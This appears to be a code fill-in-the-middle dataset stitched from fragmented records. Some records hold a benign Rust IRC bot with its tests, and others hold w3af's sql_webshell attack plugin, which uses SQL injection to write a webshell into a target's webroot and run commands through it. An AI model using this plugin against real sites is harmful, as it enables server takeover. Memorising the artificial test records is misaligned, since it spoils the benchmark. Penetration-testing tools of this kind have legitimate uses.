"alis-bot-rs",
"-c",
"/tmp/test/1_file.toml",
"/tmp/test/2_file.toml",
]
.iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
let unvalid_file = dir.path().join("error_file.toml");
let _file = File::create(&unvalid_file).unwrap();
let cmd = [
"alis-bot-rs",
"-c",
"/tmp/test/1_file.toml",
"/tmp/test/2_file.toml",
"/tmp/test/error_file.toml",
]
.iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
}
#[test]
fn multiple_files_in_directory() {
let mut expected: Vec<_> = Vec::new();
let dir = Builder::new()
.prefix("dir")
.rand_bytes(0)
.tempdir()
.unwrap();
for i in 1..4 {
let file_path = dir.path().join(format! {"{}_file.toml", i});
let mut file = File::create(&file_path).unwrap();
writeln!(file, "server = \"test\"").unwrap();
expected.push(file_path);
}
let cmd = ["alis-bot-rs", "-d", "/tmp/dir"].iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
}
#[test]
fn directory_failures_errors() {
let cmd = ["alis-bot-rs", "-d", "/unaccessible/path"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(get_config_paths_from_cli(matches).is_err());
let _dir = Builder::new()
.prefix("empty")
.rand_bytes(0)
.tempdir()
.unwrap();
let cmd = ["alis-bot-rs", "-d", "/empty/"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(
get_config_paths_from_cli(matches).is_err(),
"No valid configuration files found"
);
}
#[test]
fn use_default_config() {
let cmd = ["alis-bot-rs"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(
get_config_paths_from_cli(matches).is_err(),
"No configuration file specified"
)
}
#[test]
fn no_default_config_file() {
rename("example_config.toml", "tmp_test.toml").unwrap();
assert!(get_config_path_from_default().is_err());
rename("tmp_test.toml", "example_config.toml").unwrap();
}
}
| {
return Err(format_err!("No valid configuration files found"));
} | conditional_block |
main.rs | use alis_bot_rs::*;
use clap::{App, Arg, ArgMatches};
use failure::Error;
use futures::prelude::*;
use glob::glob;
use irc::client::prelude::*;
use log::{debug, error, info};
use std::path::PathBuf;
use std::sync::mpsc::channel;
use std::sync::{Arc, Condvar, Mutex};
use std::thread;
use tokio::runtime::Runtime;
#[macro_use]
extern crate failure;
const CONFIG_FILE_OPT: &str = "config";
const CONFIG_DIR_OPT: &str = "conf-dir";
const CONFIG_FILE_EXT: &str = "toml";
const DEFAULT_CONFIG_FILE: &str = "example_config.toml";
fn build_app() -> App<'static> {
App::new("alis-bot-rs")
.version("1.0")
.about("alis-unofficial IRC bot")
.arg(
Arg::new("config")
.about("configuration file(s) to use")
.takes_value(true)
.short('c')
.long("config")
.value_name("FILE")
.multiple(true)
.conflicts_with("conf-dir"),
)
.arg("-d, --conf-dir=[DIR] 'configuration directory to use'")
}
fn main() {
let matches = build_app().get_matches();
env_logger::init();
let configs = match get_config_paths_from_cli(matches) {
Ok(c) => c,
Err(e) => {
error!("{}", e);
match get_config_path_from_default() {
Ok(c) => c,
Err(e) => {
error!("{}", e);
return;
}
}
}
};
let rt = Runtime::new().unwrap();
/* tasked instances */
rt.block_on(async move {
for config in configs {
tokio::spawn(async move { run_instance(&config).await });
}
});
loop {}
}
fn get_config_paths_from_cli(matches: ArgMatches) -> Result<Vec<PathBuf>, Error> {
let paths: Vec<PathBuf> = {
if matches.is_present(CONFIG_FILE_OPT) {
matches
.values_of(CONFIG_FILE_OPT)
.unwrap()
.filter_map(|s| config_file_is_valid(PathBuf::from(s)).ok())
.collect()
} else if matches.is_present(CONFIG_DIR_OPT) {
if let Some(user_glob) = matches.value_of(CONFIG_DIR_OPT) {
let user_glob = format!("{}/*.{}", user_glob, CONFIG_FILE_EXT);
glob(&user_glob)
.expect("Failed to read glob pattern")
.filter_map(|s| s.ok())
.filter_map(|s| config_file_is_valid(s).ok())
.collect()
} else {
return Err(format_err!("No directory value specified"));
}
} else {
return Err(format_err!(
"No configuration file specified, using default."
));
}
};
if paths.len() == 0 {
return Err(format_err!("No valid configuration files found"));
}
Ok(paths)
}
fn config_file_is_valid(path: PathBuf) -> Result<PathBuf, Error> {
let error;
if let Ok(config) = Config::load(&path) {
if let Some(_server) = config.server {
return Ok(path);
} else {
error = format_err!(
"Configuration file: {}, no server specified",
path.as_path().display().to_string()
);
}
} else {
error = format_err!("File not found: {}", path.as_path().display().to_string());
}
error!("{}", error);
Err(error)
}
fn get_config_path_from_default() -> Result<Vec<PathBuf>, Error> {
let path = match config_file_is_valid(PathBuf::from(DEFAULT_CONFIG_FILE)) {
Ok(p) => p,
Err(e) => return Err(e),
};
info!(
"Using default configuration file: {}",
path.as_path().display().to_string()
);
Ok(vec![path])
}
async fn run_instance(config: &PathBuf) -> irc::error::Result<()> {
let config = Config::load(&config)?;
let mut client = Client::from_config(config.clone()).await?;
client.identify()?;
let mut stream = client.stream()?;
if let Some(server) = config.server {
info!("Connected to {}", server);
}
let mut server_name: Option<String> = None;
let listing = ChannelListing::new();
// private messages mpsc channel
let (ms, mr) = channel::<Message>();
// shared client
let client = Arc::new(client);
let privmsg_client = Arc::clone(&client);
// Mutex with condition for listing access
let mutcond: Arc<(Mutex<(bool, ChannelListing)>, Condvar)> =
Arc::new((Mutex::new((false, listing)), Condvar::new()));
let c_mutcond = Arc::clone(&mutcond);
let privmsg_thread = thread::spawn(move || loop {
let message = mr.recv().unwrap();
if let Command::PRIVMSG(_target, msg) = &message.command {
let source = match message.source_nickname() {
Some(s) => s,
None => continue,
};
privmsg_parse(&privmsg_client, &c_mutcond, &source, &msg);
}
});
while let Some(message) = stream.next().await.transpose()? {
match &message.command {
Command::PRIVMSG(target, _msg) => {
// responds only to private message, ignoring unspecified source and server messages
if target.eq(&client.current_nickname()) {
let source = if let Some(s) = message.source_nickname() {
s
} else {
continue;
};
match &server_name {
Some(server_name) if source.eq(server_name) => continue,
_ => ms.send(message).unwrap(),
}
}
}
Command::Response(rpl_type, v) if *rpl_type == Response::RPL_LIST => {
/* updating channel list */
let &(ref mtx, ref _cnd) = &*mutcond;
let mut guard = mtx.lock().unwrap();
let listing = &mut guard.1;
listing.add_channel(v);
}
Command::Response(rpl_type, _v) if *rpl_type == Response::RPL_LISTEND => {
let &(ref mtx, ref cnd) = &*mutcond;
let mut guard = mtx.lock().unwrap();
let listing = &mut guard.1;
listing.set_timestamp();
debug!(
"Channel list request...done. {} channels received",
&listing.len()
);
/* listing made available from now */
guard.0 = true;
cnd.notify_all();
}
Command::Response(rpl_type, _) if *rpl_type == Response::RPL_WELCOME => {
if let Some(Prefix::ServerName(name)) = &message.prefix {
server_name = Some(name.to_string());
}
send_list_command(&client);
}
_ => (),
}
}
let _ = privmsg_thread.join();
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
use std::fs::{rename, File};
use std::io::Write;
use tempfile::Builder;
#[test]
fn conflicting_args() {
let cmd = ["alis-bot-rs", "-c", "some_file", "-d", "some_dir"].iter();
let matches = build_app().try_get_matches_from(cmd);
assert!(matches.is_err());
}
#[test]
fn multiple_files_on_c_option() {
let mut expected: Vec<_> = Vec::new();
let dir = Builder::new()
.prefix("test")
.rand_bytes(0)
.tempdir()
.unwrap();
for i in 1..3 {
let file_path = dir.path().join(format! {"{}_file.toml", i});
let mut file = File::create(&file_path).unwrap();
writeln!(file, "server = \"test\"").unwrap();
expected.push(file_path);
}
let cmd = [
"alis-bot-rs",
"-c",
"/tmp/test/1_file.toml",
"/tmp/test/2_file.toml",
]
.iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
let unvalid_file = dir.path().join("error_file.toml");
let _file = File::create(&unvalid_file).unwrap();
let cmd = [
"alis-bot-rs", | "/tmp/test/1_file.toml",
"/tmp/test/2_file.toml",
"/tmp/test/error_file.toml",
]
.iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
}
#[test]
fn multiple_files_in_directory() {
let mut expected: Vec<_> = Vec::new();
let dir = Builder::new()
.prefix("dir")
.rand_bytes(0)
.tempdir()
.unwrap();
for i in 1..4 {
let file_path = dir.path().join(format! {"{}_file.toml", i});
let mut file = File::create(&file_path).unwrap();
writeln!(file, "server = \"test\"").unwrap();
expected.push(file_path);
}
let cmd = ["alis-bot-rs", "-d", "/tmp/dir"].iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
}
#[test]
fn directory_failures_errors() {
let cmd = ["alis-bot-rs", "-d", "/unaccessible/path"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(get_config_paths_from_cli(matches).is_err());
let _dir = Builder::new()
.prefix("empty")
.rand_bytes(0)
.tempdir()
.unwrap();
let cmd = ["alis-bot-rs", "-d", "/empty/"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(
get_config_paths_from_cli(matches).is_err(),
"No valid configuration files found"
);
}
#[test]
fn use_default_config() {
let cmd = ["alis-bot-rs"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(
get_config_paths_from_cli(matches).is_err(),
"No configuration file specified"
)
}
#[test]
fn no_default_config_file() {
rename("example_config.toml", "tmp_test.toml").unwrap();
assert!(get_config_path_from_default().is_err());
rename("tmp_test.toml", "example_config.toml").unwrap();
}
} | "-c", | random_line_split |
main.rs | use alis_bot_rs::*;
use clap::{App, Arg, ArgMatches};
use failure::Error;
use futures::prelude::*;
use glob::glob;
use irc::client::prelude::*;
use log::{debug, error, info};
use std::path::PathBuf;
use std::sync::mpsc::channel;
use std::sync::{Arc, Condvar, Mutex};
use std::thread;
use tokio::runtime::Runtime;
#[macro_use]
extern crate failure;
const CONFIG_FILE_OPT: &str = "config";
const CONFIG_DIR_OPT: &str = "conf-dir";
const CONFIG_FILE_EXT: &str = "toml";
const DEFAULT_CONFIG_FILE: &str = "example_config.toml";
fn build_app() -> App<'static> {
App::new("alis-bot-rs")
.version("1.0")
.about("alis-unofficial IRC bot")
.arg(
Arg::new("config")
.about("configuration file(s) to use")
.takes_value(true)
.short('c')
.long("config")
.value_name("FILE")
.multiple(true)
.conflicts_with("conf-dir"),
)
.arg("-d, --conf-dir=[DIR] 'configuration directory to use'")
}
fn main() {
let matches = build_app().get_matches();
env_logger::init();
let configs = match get_config_paths_from_cli(matches) {
Ok(c) => c,
Err(e) => {
error!("{}", e);
match get_config_path_from_default() {
Ok(c) => c,
Err(e) => {
error!("{}", e);
return;
}
}
}
};
let rt = Runtime::new().unwrap();
/* tasked instances */
rt.block_on(async move {
for config in configs {
tokio::spawn(async move { run_instance(&config).await });
}
});
loop {}
}
fn get_config_paths_from_cli(matches: ArgMatches) -> Result<Vec<PathBuf>, Error> {
let paths: Vec<PathBuf> = {
if matches.is_present(CONFIG_FILE_OPT) {
matches
.values_of(CONFIG_FILE_OPT)
.unwrap()
.filter_map(|s| config_file_is_valid(PathBuf::from(s)).ok())
.collect()
} else if matches.is_present(CONFIG_DIR_OPT) {
if let Some(user_glob) = matches.value_of(CONFIG_DIR_OPT) {
let user_glob = format!("{}/*.{}", user_glob, CONFIG_FILE_EXT);
glob(&user_glob)
.expect("Failed to read glob pattern")
.filter_map(|s| s.ok())
.filter_map(|s| config_file_is_valid(s).ok())
.collect()
} else {
return Err(format_err!("No directory value specified"));
}
} else {
return Err(format_err!(
"No configuration file specified, using default."
));
}
};
if paths.len() == 0 {
return Err(format_err!("No valid configuration files found"));
}
Ok(paths)
}
fn config_file_is_valid(path: PathBuf) -> Result<PathBuf, Error> {
let error;
if let Ok(config) = Config::load(&path) {
if let Some(_server) = config.server {
return Ok(path);
} else {
error = format_err!(
"Configuration file: {}, no server specified",
path.as_path().display().to_string()
);
}
} else {
error = format_err!("File not found: {}", path.as_path().display().to_string());
}
error!("{}", error);
Err(error)
}
fn get_config_path_from_default() -> Result<Vec<PathBuf>, Error> {
let path = match config_file_is_valid(PathBuf::from(DEFAULT_CONFIG_FILE)) {
Ok(p) => p,
Err(e) => return Err(e),
};
info!(
"Using default configuration file: {}",
path.as_path().display().to_string()
);
Ok(vec![path])
}
async fn run_instance(config: &PathBuf) -> irc::error::Result<()> {
let config = Config::load(&config)?;
let mut client = Client::from_config(config.clone()).await?;
client.identify()?;
let mut stream = client.stream()?;
if let Some(server) = config.server {
info!("Connected to {}", server);
}
let mut server_name: Option<String> = None;
let listing = ChannelListing::new();
// private messages mpsc channel
let (ms, mr) = channel::<Message>();
// shared client
let client = Arc::new(client);
let privmsg_client = Arc::clone(&client);
// Mutex with condition for listing access
let mutcond: Arc<(Mutex<(bool, ChannelListing)>, Condvar)> =
Arc::new((Mutex::new((false, listing)), Condvar::new()));
let c_mutcond = Arc::clone(&mutcond);
let privmsg_thread = thread::spawn(move || loop {
let message = mr.recv().unwrap();
if let Command::PRIVMSG(_target, msg) = &message.command {
let source = match message.source_nickname() {
Some(s) => s,
None => continue,
};
privmsg_parse(&privmsg_client, &c_mutcond, &source, &msg);
}
});
while let Some(message) = stream.next().await.transpose()? {
match &message.command {
Command::PRIVMSG(target, _msg) => {
// responds only to private message, ignoring unspecified source and server messages
if target.eq(&client.current_nickname()) {
let source = if let Some(s) = message.source_nickname() {
s
} else {
continue;
};
match &server_name {
Some(server_name) if source.eq(server_name) => continue,
_ => ms.send(message).unwrap(),
}
}
}
Command::Response(rpl_type, v) if *rpl_type == Response::RPL_LIST => {
/* updating channel list */
let &(ref mtx, ref _cnd) = &*mutcond;
let mut guard = mtx.lock().unwrap();
let listing = &mut guard.1;
listing.add_channel(v);
}
Command::Response(rpl_type, _v) if *rpl_type == Response::RPL_LISTEND => {
let &(ref mtx, ref cnd) = &*mutcond;
let mut guard = mtx.lock().unwrap();
let listing = &mut guard.1;
listing.set_timestamp();
debug!(
"Channel list request...done. {} channels received",
&listing.len()
);
/* listing made available from now */
guard.0 = true;
cnd.notify_all();
}
Command::Response(rpl_type, _) if *rpl_type == Response::RPL_WELCOME => {
if let Some(Prefix::ServerName(name)) = &message.prefix {
server_name = Some(name.to_string());
}
send_list_command(&client);
}
_ => (),
}
}
let _ = privmsg_thread.join();
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
use std::fs::{rename, File};
use std::io::Write;
use tempfile::Builder;
#[test]
fn conflicting_args() {
let cmd = ["alis-bot-rs", "-c", "some_file", "-d", "some_dir"].iter();
let matches = build_app().try_get_matches_from(cmd);
assert!(matches.is_err());
}
#[test]
fn multiple_files_on_c_option() {
let mut expected: Vec<_> = Vec::new();
let dir = Builder::new()
.prefix("test")
.rand_bytes(0)
.tempdir()
.unwrap();
for i in 1..3 {
let file_path = dir.path().join(format! {"{}_file.toml", i});
let mut file = File::create(&file_path).unwrap();
writeln!(file, "server = \"test\"").unwrap();
expected.push(file_path);
}
let cmd = [
"alis-bot-rs",
"-c",
"/tmp/test/1_file.toml",
"/tmp/test/2_file.toml",
]
.iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
let unvalid_file = dir.path().join("error_file.toml");
let _file = File::create(&unvalid_file).unwrap();
let cmd = [
"alis-bot-rs",
"-c",
"/tmp/test/1_file.toml",
"/tmp/test/2_file.toml",
"/tmp/test/error_file.toml",
]
.iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
}
#[test]
fn multiple_files_in_directory() {
let mut expected: Vec<_> = Vec::new();
let dir = Builder::new()
.prefix("dir")
.rand_bytes(0)
.tempdir()
.unwrap();
for i in 1..4 {
let file_path = dir.path().join(format! {"{}_file.toml", i});
let mut file = File::create(&file_path).unwrap();
writeln!(file, "server = \"test\"").unwrap();
expected.push(file_path);
}
let cmd = ["alis-bot-rs", "-d", "/tmp/dir"].iter();
let matches = build_app().get_matches_from(cmd);
let result = get_config_paths_from_cli(matches).unwrap();
assert_eq!(result, expected);
}
#[test]
fn | () {
let cmd = ["alis-bot-rs", "-d", "/unaccessible/path"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(get_config_paths_from_cli(matches).is_err());
let _dir = Builder::new()
.prefix("empty")
.rand_bytes(0)
.tempdir()
.unwrap();
let cmd = ["alis-bot-rs", "-d", "/empty/"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(
get_config_paths_from_cli(matches).is_err(),
"No valid configuration files found"
);
}
#[test]
fn use_default_config() {
let cmd = ["alis-bot-rs"].iter();
let matches = build_app().get_matches_from(cmd);
assert!(
get_config_paths_from_cli(matches).is_err(),
"No configuration file specified"
)
}
#[test]
fn no_default_config_file() {
rename("example_config.toml", "tmp_test.toml").unwrap();
assert!(get_config_path_from_default().is_err());
rename("tmp_test.toml", "example_config.toml").unwrap();
}
}
| directory_failures_errors | identifier_name |
sql_webshell.py | '''
sql_webshell.py
Copyright 2006 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
import core.controllers.outputManager as om
import core.data.request.httpPostDataRequest as httpPostDataRequest
import core.data.request.httpQsRequest as httpQsRequest
from core.controllers.basePlugin.baseAttackPlugin import baseAttackPlugin
from core.data.parsers.urlParser import parse_qs, url_object
from core.controllers.w3afException import w3afException
from plugins.attack.db.dbDriverBuilder import dbDriverBuilder as dbDriverBuilder
from core.controllers.sql_tools.blind_sqli_response_diff import blind_sqli_response_diff
from core.controllers.misc.webroot import get_webroot_dirs
from core.data.fuzzer.fuzzer import createRandAlNum
import core.data.kb.knowledgeBase as kb
import core.data.kb.vuln as vuln
from core.data.kb.shell import shell as shell
import plugins.attack.payloads.shell_handler as shell_handler
from plugins.attack.payloads.decorators.exec_decorator import exec_debug
# options
from core.data.options.option import option
from core.data.options.optionList import optionList
import urllib
class sql_webshell(baseAttackPlugin):
'''
Exploits [blind] sql injections by uploading a webshell to the target webroot.
'''
def __init__(self):
baseAttackPlugin.__init__(self)
# Internal variables
self._vuln = None
self._driver = None
# User configured options for fastExploit
self._url = ''
self._method = 'GET'
self._data = ''
self._injvar = ''
# User configured variables
self._equalLimit = 0.9
self._equAlgorithm = 'setIntersection'
self._goodSamaritan = True
self._generateOnlyOne = True
def fastExploit( self ):
'''
Exploits a web app with [blind] sql injections vulns.
The options are configured using the plugin options and setOptions() method.
'''
om.out.debug( 'Starting sql_webshell fastExploit.' )
if self._url is None or self._method is None or self._data is None or self._injvar is None:
raise w3afException('You have to configure the plugin parameters')
else:
freq = None
if self._method == 'POST':
freq = httpPostDataRequest.httpPostDataRequest()
elif self._method == 'GET':
freq = httpQsRequest.httpQsRequest()
else:
raise w3afException('Method not supported.')
freq.setURL( self._url )
freq.setDc( parse_qs( self._data ) )
freq.setHeaders( {} )
bsql = blind_sqli_response_diff()
bsql.setUrlOpener( self._urlOpener )
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
vuln_obj = bsql.is_injectable( freq, self._injvar )
if not vuln_obj:
raise w3afException('Could not verify SQL injection ' + str(vuln) )
else:
om.out.console('SQL injection could be verified, trying to create the DB driver.')
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
msg += '. Please wait...'
om.out.console( msg )
shell_obj = self._generateShell( vuln_obj )
if shell_obj is not None:
kb.kb.append( self, 'shell', shell_obj )
return [shell_obj, ]
raise w3afException('No exploitable vulnerabilities found.')
def getAttackType(self):
'''
@return: The type of exploit, SHELL, PROXY, etc.
'''
return 'shell'
def getExploitableVulns(self):
vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' )
vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) )
return vulns
def canExploit( self, vulnToExploit=None ):
'''
Searches the kb for vulnerabilities that the plugin can exploit.
@return: True if plugin knows how to exploit a found vuln.
'''
vulns = self.getExploitableVulns()
if vulnToExploit is not None:
vulns = [ v for v in vulns if v.getId() == vulnToExploit ]
if len(vulns) != 0:
return True
else:
om.out.console( 'No [blind] SQL injection vulnerabilities have been found.' )
om.out.console( 'Hint #1: Try to find vulnerabilities using the audit plugins.' )
msg = 'Hint #2: Use the set command to enter the values yourself, and then exploit it using fastExploit.'
om.out.console( msg )
return False
def exploit( self, vulnToExploit=None ):
'''
Exploits a [blind] sql injections vulns that was found and stored in the kb.
@return: True if the shell is working and the user can start calling specific_user_input
'''
if not self.canExploit():
return []
else:
vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' )
vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) )
bsql = blind_sqli_response_diff()
bsql.setUrlOpener( self._urlOpener )
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
tmp_vuln_list = []
for v in vulns:
# Filter the vuln that was selected by the user
if vulnToExploit is not None:
if vulnToExploit != v.getId():
continue
mutant = v.getMutant()
mutant.setModValue( mutant.getOriginalValue() )
v.setMutant( mutant )
# The user didn't selected anything, or we are in the selected vuln!
om.out.debug('Verifying vulnerability in URL: "' + v.getURL() + '".')
vuln_obj = bsql.is_injectable( v.getMutant().getFuzzableReq(), v.getVar() )
if vuln_obj:
tmp_vuln_list.append( vuln_obj )
# Ok, go to the next stage with the filtered vulnerabilities
vulns = tmp_vuln_list
if len(vulns) == 0:
om.out.debug('is_injectable failed for all vulnerabilities.')
return []
else:
for vuln_obj in vulns:
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
msg += '. Please wait...'
om.out.console( msg )
shell_obj = self._generateShell( vuln_obj )
if shell_obj:
if self._generateOnlyOne:
# A shell was generated, I only need one point of exec.
return [shell_obj, ]
else:
# Keep adding all shells to the kb
pass
return kb.kb.getData( self.getName(), 'shell' )
def _generateShell( self, vuln_obj ):
'''
@parameter vuln_obj: The vuln to exploit, as it was saved in the kb or supplied by the user with set commands.
@return: A sql_webshell shell object if sql_webshell could fingerprint the database.
'''
bsql = blind_sqli_response_diff()
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
dbBuilder = dbDriverBuilder( self._urlOpener, bsql.equal )
driver = dbBuilder.getDriverForVuln( vuln_obj )
if driver is None:
return None
else:
# We have a driver, now, using this driver, we have to create the webshell in the
# target's webroot!
webshell_url = self._upload_webshell( driver, vuln_obj )
if webshell_url:
# Define the corresponding cut...
response = self._urlOpener.GET( webshell_url )
self._define_exact_cut( response.getBody(), shell_handler.SHELL_IDENTIFIER )
# Create the shell object
# Set shell parameters
shell_obj = sql_web_shell( vuln_obj )
shell_obj.setUrlOpener( self._urlOpener )
shell_obj.setWebShellURL( webshell_url )
shell_obj.set_cut( self._header_length, self._footer_length )
kb.kb.append( self, 'shell', shell_obj )
return shell_obj
else:
# Sad face :(
return None
def _upload_webshell(self, driver, vuln_obj):
'''
First, upload any file to the target webroot.
Once I've found the target webroot (or any other location inside the webroot where I can
write a file) try to upload a webshell and test for execution.
@parameter driver: The database driver to use in order to upload the file.
@parameter vuln_obj: The vulnerability that we are exploiting.
@return: The webshell URL if the webshell was uploaded, or None if the process failed.
'''
upload_success = False
# First, we test if we can upload a file into a directory we can access:
webroot_dirs = get_webroot_dirs( vuln_obj.getURL().getDomain() )
for webroot in webroot_dirs:
if upload_success: break
# w3af found a lot of directories, and we are going to use that knowledgeBase
# because one of the dirs may be writable and one may not!
for path in self._get_site_directories():
# Create the remote_path
remote_path = webroot + '/' + path
# Create the filename
remote_filename = createRandAlNum( 8 ) + '.' + createRandAlNum(3)
remote_path += '/' + remote_filename
# And just in case... remove double slashes
for i in xrange(3): remote_path = remote_path.replace('//', '/')
# Create the content (which will also act as the test_string)
test_string = content = createRandAlNum(16)
# Create the test URL
test_url = vuln_obj.getURL().urlJoin( path + '/' + remote_filename )
if self._upload_file( driver, remote_path, content, test_url, test_string):
upload_success = True
om.out.console('Successfully wrote a file to the webroot.')
break
# We can upload files, and we know where they are uploaded, now we
# just need to upload a webshell that works in that environment!
if upload_success:
om.out.console('Trying to write a webshell.')
# Get the extension from the vulnerable script
extension = vuln_obj.getURL().getExtension()
for file_content, real_extension in shell_handler.get_webshells( extension ):
# Create the variables to upload the file, based on the success of the
# previous for loop:
remote_path = remote_path[:remote_path.rfind('/')]
filename = createRandAlNum( 8 )
remote_path += '/' + filename + '.' + real_extension
# And now do "the same thing" with the URL
test_url = test_url[:test_url.rfind('/')]
test_url += '/' + filename + '.' + real_extension + '?cmd='
# Upload & test
if self._upload_file( driver, remote_path, file_content, test_url, shell_handler.SHELL_IDENTIFIER):
# Complete success!
om.out.console('Successfully installed a webshell in the target server!')
return test_url
return None
def _upload_file(self, driver, remote_path, content, test_url, test_string):
'''
Uploads a file to the target server, to the remote_path using the given SQL driver.
The content of the file is "content", and check if it was successfully uploaded using a
GET request to test_url and searching for the test_string string.
@return: True if the file was uploaded.
'''
msg = 'Writing "' + content + '" to "' + remote_path +'" and searching it at: "'
msg += test_url +'".'
om.out.debug( msg )
try:
driver.writeFile( remote_path , content )
response = self._urlOpener.GET( test_url )
except Exception, e:
om.out.error('Exception raised while uploading file: "' + str(e) + '".')
return False
else:
if test_string in response.getBody():
return True
else:
|
def _get_site_directories(self):
'''
@return: A list of the website directories.
'''
url_list = kb.kb.getData('urls','urlList')
url_list = [ i.getPathWithoutFile() for i in url_list ]
url_list = list(set(url_list))
return url_list
def getOptions( self ):
'''
@return: A list of option objects for this plugin.
'''
d1 = 'URL to exploit with fastExploit()'
o1 = option('url', self._url, d1, 'string')
d2 = 'Method to use with fastExploit()'
o2 = option('method', self._method, d2, 'string')
d3 = 'Data to send with fastExploit()'
o3 = option('data', self._data, d3, 'string')
d4 = 'Variable where to inject with fastExploit()'
o4 = option('injvar', self._injvar, d4, 'string')
d5 = 'The algorithm to use in the comparison of true and false response for blind sql.'
h5 = 'The options are: "stringEq" and "setIntersection". Read the user documentation for'
h5 += ' details.'
o5 = option('equAlgorithm', self._equAlgorithm, d5, 'string', help=h5)
d6 = 'Set the equal limit variable'
h6 = 'Two pages are equal if they match in more than equalLimit. Only used when'
h6 += ' equAlgorithm is set to setIntersection.'
o6 = option('equalLimit', self._equalLimit, d6, 'float', help=h6)
d7 = 'Enable or disable the good samaritan module'
h7 = 'The good samaritan module is a the best way to speed up blind sql exploitations.'
h7 += ' It\'s really simple, you see messages in the console that show the status of the'
h7 += ' discovery and you can help the discovery. For example, if you see "Micros" you'
h7 += ' could type "oft", and if it\'s correct, you have made your good action of the day'
h7 += ', speeded up the discovery AND had fun doing it.'
o7 = option('goodSamaritan', self._goodSamaritan, d7, 'boolean', help=h7)
d8 = 'If true, this plugin will try to generate only one shell object.'
o8 = option('generateOnlyOne', self._generateOnlyOne, d8, 'boolean')
ol = optionList()
ol.add(o1)
ol.add(o2)
ol.add(o3)
ol.add(o4)
ol.add(o5)
ol.add(o6)
ol.add(o7)
ol.add(o8)
return ol
def setOptions( self, optionsMap ):
'''
This method sets all the options that are configured using the user interface
generated by the framework using the result of getOptions().
@parameter optionsMap: A map with the options for the plugin.
@return: No value is returned.
'''
self._url = url_object( optionsMap['url'].getValue() ).uri2url()
if optionsMap['method'].getValue() not in ['GET', 'POST']:
raise w3afException('Unknown method.')
else:
self._method = optionsMap['method'].getValue()
self._data = optionsMap['data'].getValue()
self._injvar = optionsMap['injvar'].getValue()
self._equAlgorithm = optionsMap['equAlgorithm'].getValue()
self._equalLimit = optionsMap['equalLimit'].getValue()
self._goodSamaritan = optionsMap['goodSamaritan'].getValue()
self._generateOnlyOne = optionsMap['generateOnlyOne'].getValue()
def getPluginDeps( self ):
'''
@return: A list with the names of the plugins that should be runned before the
current one.
'''
return []
def getRootProbability( self ):
'''
@return: This method returns the probability of getting a root shell using this attack plugin.
This is used by the "exploit *" function to order the plugins and first try to exploit the more critical ones.
This method should return 0 for an exploit that will never return a root shell, and 1 for an exploit that WILL ALWAYS
return a root shell.
'''
return 0.1
def getLongDesc( self ):
'''
@return: A DETAILED description of the plugin functions and features.
'''
return '''
This plugin exploits [blind] sql injections.
The original sql_webshell program was coded by Bernardo Damele and Daniele Bellucci, many thanks to both of
them.
Seven configurable parameters exist:
- url
- method
- data
- injvar
- equAlgorithm
- equalLimit
'''
class sql_web_shell(shell):
def setWebShellURL( self, eu ):
self._webshell_url = eu
def getWebShellURL( self ):
return self._webshell_url
@exec_debug
def execute( self, command ):
'''
This method is called when a user writes a command in the shell and hits enter.
Before calling this method, the framework calls the generic_user_input method
from the shell class.
@parameter command: The command to handle ( ie. "read", "exec", etc ).
@return: The result of the command.
'''
to_send = self.getWebShellURL() + urllib.quote_plus( command )
response = self._urlOpener.GET( to_send )
return self._cut(response.getBody())
def end( self ):
om.out.debug('sql_web_shell cleanup complete.')
def getName( self ):
return 'sql_web_shell'
| return False | conditional_block |
sql_webshell.py | '''
sql_webshell.py
Copyright 2006 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
